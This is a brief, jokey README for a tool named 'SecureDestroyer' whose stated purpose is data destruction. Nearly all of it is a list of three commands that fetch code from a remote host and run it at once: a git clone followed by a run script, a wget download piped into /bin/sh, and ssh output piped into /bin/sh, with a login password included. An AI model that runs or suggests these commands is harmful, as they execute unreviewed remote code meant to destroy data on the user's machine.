SecureDestroyer
-

**Why?**

Because data destruction, and AWOO!~

**How do I run it?**

You can run it by running any of these commands:\
**1:** `git clone https://gitlab.com/KinoshitaProductions/SecureDestroyer; SecureDestroyer/run`\
**2:** `wget https://thearcanebrony.net/destroy -O - | /bin/sh`\
**3:** `ssh destroy@thearcanebrony.net exit | /bin/sh`
- Password: destroy1
